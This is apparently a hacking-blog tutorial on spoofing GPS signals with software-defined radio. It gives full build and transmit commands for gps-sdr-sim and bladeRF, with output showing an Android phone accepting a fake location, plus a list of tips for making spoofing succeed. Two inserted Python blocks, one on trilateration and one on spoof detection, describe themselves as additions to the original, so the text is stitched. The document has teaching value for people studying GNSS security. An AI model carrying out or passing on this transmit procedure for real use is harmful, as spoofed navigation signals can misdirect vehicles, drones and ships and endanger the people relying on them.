Welcome back, aspiring cyberwarriors!
Today, we would like to move one layer deeper into the world of software defined radio. Using SDR hardware and openly available tools, we will look at how GNSS signals are generated, transmitted and trusted by receiving devices. This topic matters more than it might seem. Phones, drones, cars, and many automated systems treat location data as ground truth, yet that data comes from radio signals that can be generated by anyone who understands the system well enough.
GPS spoofing can represent a real threat. A group of students from the University of Texas designed and successfully tested a GPS spoofing device capable of generating fake GPS signals. During testing, the students managed to “hijack,” meaning alter the course of, a 65 meter yacht called “White Rose,” valued at 80 million dollars, in the Mediterranean Sea by placing the equipment onboard the vessel. All of the equipment, a laptop and a small antenna, had a total cost of no more than 3,000 dollars.
The device’s operating principle is shown in the video.
Theory
Before we start doing anything, we need to understand the theory.
GNSS
The Global Navigation Satellite System, or GNSS, is the technology that allows devices to determine their geographic location anywhere on Earth. In simple terms, GNSS is not a single system but a collection of satellite constellations and supporting ground infrastructure working together. The most well-known example is the American GPS system, but it is not the only one. Other major systems include Galileo, operated by European Union countries, BeiDou from China, and the Russian GLONASS system. All GNSS systems follow the same general architectural idea. To determine a location, three major groups of components are involved: the space segment, the control segment on the ground, and the user segment.
The space segment consists of satellites orbiting the Earth. Each navigation system has its own constellation of satellites flying in carefully calculated orbits. These satellites continuously transmit navigation data using specific radio frequencies and precise timing. Different systems use different frequencies and transmission schedules so that they can coexist without interfering with one another.
The ground-based, or control, segment is responsible for keeping the entire system reliable. Ground stations monitor satellite health, synchronize their atomic clocks, correct orbital drift, and upload updated navigation data. This ensures that the information broadcast by satellites remains accurate. Without this segment, small timing errors would quickly accumulate and make location calculations unreliable.
The user segment consists of all receiving devices. The most familiar example is the GNSS receiver inside a smartphone, but this category also includes car navigation systems, drones, aviation equipment, maritime systems, and countless embedded devices.
To determine its position, a receiver must collect signals from multiple satellites and process them mathematically. This process is commonly referred to as triangulation, although in practice other mathematical approaches are used as well. What matters is that the receiver performs all calculations locally. Satellites do not know where you are, and your device does not transmit its position back to them.
Frequencies
GNSS systems transmit data over specific radio frequencies. Understanding these frequencies is important, especially when discussing spoofing, jamming, or signal simulation. While each satellite system has its own details, most civilian GNSS systems operate within three main frequency bands known as L1, L2, and L5.
Together, these bands form what is known as the L band, or the decimeter wave band. This range covers frequencies from roughly 1 to 2 GHz, or 1000 to 2000 MHz. Multiple navigation systems can operate within the same band at the same time. For example, GPS, GLONASS, and Galileo all transmit signals in the L1 band simultaneously.
The L1 band is the oldest and most widely supported. Almost all GNSS receivers can process L1 signals. Its main disadvantage is poor penetration. Signals in this range do not bend well around obstacles and are easily weakened by buildings, dense foliage, terrain, or even certain atmospheric conditions.
The L2 band was introduced later as an improvement. Signals in this band are more resilient and can sometimes be received in environments where L1 struggles. Because L2 is newer, many devices use it together with L1 to improve accuracy and reliability rather than relying on it alone.
The L5 band is the newest and most advanced. It was designed primarily for aviation and safety critical applications, offering higher precision and better resistance to interference. Some civilian receivers can use L5, but it is still less common than L1 and L2.

Different frequencies are assigned different purposes. Frequencies marked as ARNS are typically reserved for aviation, while RNSS frequencies are used for general navigation by civilian ground receivers.
More Details About Bands and Frequencies
GPS is unique in that it operates across all three bands, while other navigation systems do not yet occupy every available frequency. In the L1 band, GPS transmits at 1575.42 MHz. Galileo uses the same frequency, while GLONASS operates slightly higher, around 1602 MHz.
In the L2 band, GPS transmits at 1227.6 MHz, and GLONASS operates at approximately 1246 MHz.
In the L5 band, Galileo uses two frequencies, 1207.14 MHz and 1176.45 MHz, while GPS uses only one frequency at 1176.45 MHz.
Civilian and military signals are separated. Military GNSS signals are far more precise and resistant to interference, but they are encrypted specifically to prevent unauthorized use. In this article, we focus only on civilian signals. It is important to understand that a satellite never sends your location to you. Each receiver calculates its own position independently. To do this, it must receive signals from multiple satellites at the same time, usually at least three or four. Each satellite transmits its own position and a highly precise timestamp. Using these values, the receiver calculates how far away each satellite is and determines its own coordinates.
Two main mathematical approaches are used for this calculation: triangulation and trilateration.
Triangulation determines position using angles between reference points. While this method works well in theory, it becomes impractical with satellites located approximately 20,000 kilometers above Earth. Measuring angles with sufficient precision at that distance is extremely difficult.

Instead, GNSS systems rely on trilateration. In this method, the receiver calculates its position based on distances rather than angles. Each satellite defines a sphere with a radius equal to the distance between the satellite and the receiver. The receiver’s position lies at the intersection of these spheres. Distance is calculated by multiplying the signal’s travel time by the speed of light. This requires extremely precise timing, which is why atomic clocks are such a critical component of GNSS systems.
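To make the trilateration described above concrete, here is an added worked example that is not part of the original article: it solves the receiver position together with the receiver clock bias from pseudoranges by iterative least squares, the standard single-point method. The satellite positions, the receiver position and the clock bias are constructed values (ECEF-style metres, not real satellites), chosen only to be geometrically plausible. The example also shows why timing matters so much: a 1 microsecond clock error becomes about 300 metres of range error.

```python
import math

C = 299_792_458.0  # speed of light in m/s: range = travel time * C

# Constructed geometry (not real satellites): five satellites roughly
# 20,000 km above a receiver that sits on the x-axis of the frame.
SATS = [
    (26.6e6, 0.0, 0.0),
    (20.0e6, 15.0e6, 5.0e6),
    (18.0e6, -12.0e6, 14.0e6),
    (22.0e6, 3.0e6, -13.0e6),
    (15.0e6, -20.0e6, -9.0e6),
]
TRUE_RECEIVER = (6.371e6, 0.0, 0.0)   # constructed point on the Earth's surface
TRUE_CLOCK_BIAS_S = 1e-6              # constructed: receiver clock is 1 us off


def distance(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def range_error_m(clock_error_s):
    """Range error caused by a timing error: 1 us of clock error is ~300 m."""
    return C * clock_error_s


def pseudoranges(sats, receiver, clock_bias_s):
    """Constructed measurements: true distance plus the common offset that
    the receiver's clock bias adds to every measured travel time."""
    return [distance(s, receiver) + range_error_m(clock_bias_s) for s in sats]


def solve_linear(A, b):
    """Gaussian elimination with partial pivoting for the small 4x4 system."""
    n = len(b)
    M = [list(row) + [bi] for row, bi in zip(A, b)]
    for col in range(n):
        piv = max(range(col, n), key=lambda r: abs(M[r][col]))
        M[col], M[piv] = M[piv], M[col]
        for r in range(col + 1, n):
            f = M[r][col] / M[col][col]
            for k in range(col, n + 1):
                M[r][k] -= f * M[col][k]
    x = [0.0] * n
    for i in range(n - 1, -1, -1):
        x[i] = (M[i][n] - sum(M[i][k] * x[k] for k in range(i + 1, n))) / M[i][i]
    return x


def trilaterate(sats, rho, max_iter=20, tol_m=1e-4):
    """Gauss-Newton least squares for the unknowns (x, y, z, c*dt).
    Four unknowns (three of position plus the clock bias) is why a receiver
    needs at least four satellites; more satellites over-determine the fit."""
    if len(sats) < 4:
        raise ValueError("need at least four pseudoranges")
    x = [0.0, 0.0, 0.0, 0.0]  # start at the Earth's centre with zero clock bias
    for _ in range(max_iter):
        H, r = [], []
        for s, p in zip(sats, rho):
            d = distance(s, x[:3])
            # partial derivatives of the predicted pseudorange w.r.t. x, y, z, c*dt
            H.append([(x[0] - s[0]) / d, (x[1] - s[1]) / d, (x[2] - s[2]) / d, 1.0])
            r.append(p - (d + x[3]))  # measured minus predicted pseudorange
        # normal equations: (H^T H) dx = H^T r
        HtH = [[sum(h[i] * h[j] for h in H) for j in range(4)] for i in range(4)]
        Htr = [sum(h[i] * ri for h, ri in zip(H, r)) for i in range(4)]
        dx = solve_linear(HtH, Htr)
        x = [xi + di for xi, di in zip(x, dx)]
        if max(abs(v) for v in dx) < tol_m:
            break
    return (x[0], x[1], x[2]), x[3] / C


def demo():
    """Build pseudoranges from the constructed truth and recover it."""
    rho = pseudoranges(SATS, TRUE_RECEIVER, TRUE_CLOCK_BIAS_S)
    return trilaterate(SATS, rho)


if __name__ == "__main__":
    pos, bias = demo()
    print("position (m):", [round(v, 3) for v in pos])
    print("clock bias (s):", bias)
    print("range error from a 1 us clock error (m):", range_error_m(1e-6))
```

The clock bias is solved as a fourth unknown precisely because the receiver's own clock is nowhere near atomic quality; the satellites' clocks are, which is what keeps the transmitted timestamps trustworthy in the first place.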
TTFF
TTFF stands for Time To First Fix. It describes how long a GNSS receiver needs to determine its location after being powered on or reset. This parameter is especially important when discussing spoofing and signal simulation. If a device has no stored satellite data, the initial fix can take up to twelve minutes in the worst case. In practice, it usually takes two to three minutes. Devices that already have partial satellite data can achieve a fix much faster.
Practice
There are many GPS spoofing guides available online, but most of them no longer work reliably. Modern smartphones rarely rely on GNSS alone. They often combine satellite data with Wi-Fi positioning, Bluetooth beacons, and even cellular tower information. To better understand these challenges, we begin with a practical experiment. The goal is to spoof GPS data on an Android smartphone and observe how modern devices react to manipulated satellite signals.
Equipment
In this experiment, the following equipment is used:
1. BladeRF 2.0 Micro xA4 as a transmitter
2. HackRF One as a receiver and transmitter
3. An RFSPACE antenna
4. Mi A2 smartphone
Each of these components plays a specific role in generating, transmitting, and observing spoofed GNSS signals.
GPS-SDR-SIM
GPS-SDR-SIM is a tool that allows the generation of GNSS data for any chosen location or movement path. To do this, it uses ephemeris data, which contains satellite position information for a specific time window. This tool is one of the most popular and widely known GPS spoofing utilities. At the time of writing, its repository has accumulated over 3,000 stars and is actively maintained.
We begin by downloading the source code and building the program.
bash# > git clone https://github.com/Nuand/gps-sdr-sim
bash# > cd gps-sdr-sim
bash# > gcc gpssim.c -lm -O3 -o gps-sdr-sim
Once compiled, the bladeRF is connected and used to generate a signal file.
bash# > ./gps-sdr-sim -e hour3060.22n -l 21.296965,-157.815687,100 -b 16 -o gpssim.bin -t $(date -u +%Y/%m/%d,+%X)
Satellite data can be downloaded from NASA. Here, data is provided for each hour, which makes it possible to avoid time-related errors. This solves the issue that exists in many other guides.
The -t parameter sets the start time of the simulated scenario, and the -d parameter sets how long, in seconds, the simulated satellites transmit data. The start time is critical. Modern smartphones reject navigation data that is even a few hours out of date.
Using static location mode.
Start time = 2025/12/05,11:26:00 (2234:285693)
Duration = 300.0 [sec]
02 180.0 25.6 22759545.5 6.5
06 54.7 20.9 23631267.8 5.3
11 90.0 38.3 22154769.5 4.3
12 355.4 46.2 21368898.6 4.0
13 163.0 4.3 25471171.1 10.3
15 186.1 19.4 24115672.2 7.7
19 38.7 3.5 25179568.2 5.6
20 119.8 1.4 25729982.2 7.7
24 102.8 78.9 20375053.9 3.1
25 312.8 32.9 22268020.3 5.5
29 231.8 37.9 22208289.9 5.3
32 306.8 14.9 24242464.5 8.5
Time into run = 300.0
Done!
Process time = 46.2 [sec]
An Invalid Start Time error should not cause concern. It simply indicates that the ephemeris data has not yet been updated on the NASA servers. Waiting for new data and repeating the process usually resolves the issue.
bash# > bladeRF-cli -i
bladeRF > set frequency 1575.42M
For best results, it is not recommended to set both RX and TX to the
same frequency. Instead, consider offsetting them by at least 1 MHz
and mixing digitally.
For the above reason, 'set frequency' is deprecated and
scheduled for removal in future bladeRF-cli versions.
Please use 'set frequency rx' and 'set frequency tx' to configure
channels individually.
RX1 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
RX2 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
TX1 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])
TX2 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])
bladeRF > set samplerate 2.6M
Setting RX1 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting RX2 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX1 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX2 sample rate - req: 2600000 0/1Hz, actual: 2600000 0/1Hz
bladeRF > set bandwidth 2.5M
RX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
RX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
bladeRF > set gain tx 56
Setting TX1 overall gain to 56 dB
Gain TX1 overall: 56 dB (Range: [-23.75, 66])
dsa: -90 dB (Range: [-89.75, 0])
bladeRF > tx config file=/home/user/gps-sdr-sim/gpssim.bin format=bin
bladeRF > tx start
bladeRF > tx wait
Once the signal file is ready, a GPS monitoring application such as GPS Test is installed on the smartphone. Transmission is started from the computer, and the phone begins displaying satellites with strong signal levels.

At this stage, the device still reports No Fix. This means that satellites are visible, but the system refuses to calculate a position. The green lines shown on the screen represent spoofed satellites generated by the bladeRF. Everything appears functional, yet the phone remains unconvinced. To rule out timing issues, the phone is rebooted and transmission is left running for five minutes. The result remains unchanged. Because the coordinate file is slightly outdated, the phone’s system time is adjusted backward, and the spoofed location is shifted only one kilometer away from the real location. Large, sudden jumps are often rejected as implausible, so gradual movement is essential.
bash# > ./gps-sdr-sim -e brdc2025_3060.25n -d 1000 -l 51.296965,124.815687,100 -b 16 -o gpssim.bin -t 2025/12/05,12:00:00
Using static location mode.
Start time = 2025/12/05,12:00:00 (2234:288000)
Duration = 1000.0 [sec]
02 174.0 43.6 21497540.2 3.6
05 140.4 4.3 25351515.3 6.8
06 41.5 11.5 24590008.1 4.2
11 66.9 36.4 22296887.8 3.3
12 20.6 45.8 21422074.0 3.1
15 176.8 7.9 25304780.7 8.2
18 198.6 4.3 25335825.2 10.3
20 104.6 6.7 25172344.8 4.8
22 314.6 4.6 25557500.2 8.9
24 146.6 63.7 20898055.3 2.7
25 332.2 40.0 21745559.7 3.7
29 253.1 49.9 21398805.8 3.4
32 290.3 19.4 23734754.8 6.5
Time into run = 1000.0
Done!
Process time = 142.4 [sec]
We start the transmission again and look at the result:

This time, the status changes to 3D Fix. The device accepts the location. The satellite time is slightly behind the phone’s internal clock but remains within acceptable limits. Depending on the device, satellite data can remain valid anywhere from thirty minutes to four hours. The phone’s actual system time differs by thirty-four minutes, which is considered normal when no real satellites are visible.
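The two outcomes above (No Fix after a sudden one-kilometre jump, then 3D Fix once the satellite time fell within the phone's tolerance) are the receiver's side of the story. The following added example, which is not part of the original article, sketches the kind of plausibility checks a receiver or location-aware app can run over a sequence of fixes: an implausible speed between consecutive fixes, a large gap between decoded satellite time and the system clock, and a set of tracked satellites that all report nearly identical signal strength, something a real sky rarely produces because elevation and obstructions vary per satellite. The Fix record, the thresholds and the four constructed fixes are assumptions made for illustration, not values from the article or from any particular phone.

```python
import math
from dataclasses import dataclass
from typing import List

EARTH_RADIUS_M = 6_371_000.0


@dataclass
class Fix:
    """One position report as a receiver or app would see it (constructed shape)."""
    t: float            # time of the fix on the device's own clock, seconds
    gnss_t: float       # time decoded from the navigation data, seconds
    lat: float          # degrees
    lon: float          # degrees
    cn0: List[float]    # carrier-to-noise density per tracked satellite, dB-Hz


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two latitude/longitude points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def assess_fix(prev, cur, max_speed_mps=70.0, max_clock_offset_s=3600.0,
               min_cn0_spread_db=4.0):
    """Return the list of plausibility flags raised by `cur` given the previous fix.
    Thresholds are assumed values: ~250 km/h for a handheld device, one hour of
    clock disagreement, and a 4 dB spread across at least four satellites."""
    flags = []
    if prev is not None:
        dt = cur.t - prev.t
        if dt <= 0:
            flags.append("non_monotonic_time")
        else:
            speed = haversine_m(prev.lat, prev.lon, cur.lat, cur.lon) / dt
            if speed > max_speed_mps:
                flags.append("implausible_jump")
    if abs(cur.gnss_t - cur.t) > max_clock_offset_s:
        flags.append("clock_mismatch")
    if len(cur.cn0) >= 4 and (max(cur.cn0) - min(cur.cn0)) < min_cn0_spread_db:
        flags.append("uniform_signal_strength")
    return flags


def assess_track(fixes, **thresholds):
    """Run assess_fix over a whole sequence and return one flag list per fix."""
    results, prev = [], None
    for f in fixes:
        results.append(assess_fix(prev, f, **thresholds))
        prev = f
    return results


# Constructed track near the coordinates used in the first simulation run:
# two ordinary fixes, then a 1 km jump within one second with flat signal
# levels, then a fix whose decoded time is five hours behind the device clock.
FIXES = [
    Fix(t=0.0, gnss_t=0.5, lat=21.2970, lon=-157.8157, cn0=[44, 38, 41, 35, 47, 30]),
    Fix(t=10.0, gnss_t=10.5, lat=21.2971, lon=-157.8156, cn0=[44, 39, 41, 36, 46, 31]),
    Fix(t=11.0, gnss_t=11.5, lat=21.3060, lon=-157.8157, cn0=[45, 45, 46, 45, 45, 46]),
    Fix(t=21.0, gnss_t=21.0 - 5 * 3600, lat=21.3061, lon=-157.8157, cn0=[45, 45, 46, 45, 45, 46]),
]


if __name__ == "__main__":
    for fix, flags in zip(FIXES, assess_track(FIXES)):
        print(f"t={fix.t:5.1f}s  flags={flags or 'none'}")
```

None of these checks proves spoofing on its own; a phone that fuses Wi-Fi, cellular and inertial data has more to compare against, which is exactly why the article notes that those sources can override a spoofed GNSS position.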
What to Pay Attention To
There are several practical rules that greatly increase the chances of successful GPS spoofing.
1. Always monitor ephemeris data from NASA, as it is updated frequently.
2. Pay close attention to the time transmitted by spoofed satellites. Many devices reject heavily outdated data.
3. Allow enough time for the device to store and process fake satellite information.
4. Avoid large, sudden changes in location. Gradual movement appears far more realistic.
5. Be aware of Wi-Fi and cellular positioning. Even if GNSS is spoofed, these can override location on some devices.
6. Use a proper antenna designed for GNSS frequencies.
7. When using HackRF, verify the presence of an external crystal oscillator to prevent timing drift.
Because satellites visible in one geographic region differ from those in another, spoofing only the satellites commonly observed at the current location improves success rates.
8. Some mapping applications rely on third-party data sources. Apple Maps and Google Maps may report different positions, with Google often appearing more accurate.
9. Clearing old GPS data significantly improves spoofing success.
10. Setting the system time as close as possible to real satellite time increases reliability. If that fails, waiting ten to fifteen minutes often allows the device to accept new data.
Summary
Despite continuous improvements by device manufacturers, GPS spoofing remains possible under specific conditions. As more autonomous and location dependent systems enter daily life, this issue becomes increasingly serious. Spoofing a phone for amusement is one thing. Influencing the navigation decisions of autonomous vehicles or drones is something entirely different. And that is something we need to be concerned about.
For readers who want to go further, we have our training on Satellite Hacking. The course introduces the fundamentals of satellite signal interception, common security weaknesses, and real-world attack surfaces in space-based technologies.
Source: HackersArise
Source Link: https://hackers-arise.com/sdr-signals-intelligence-for-hackers-building-your-own-fake-gps-satellite/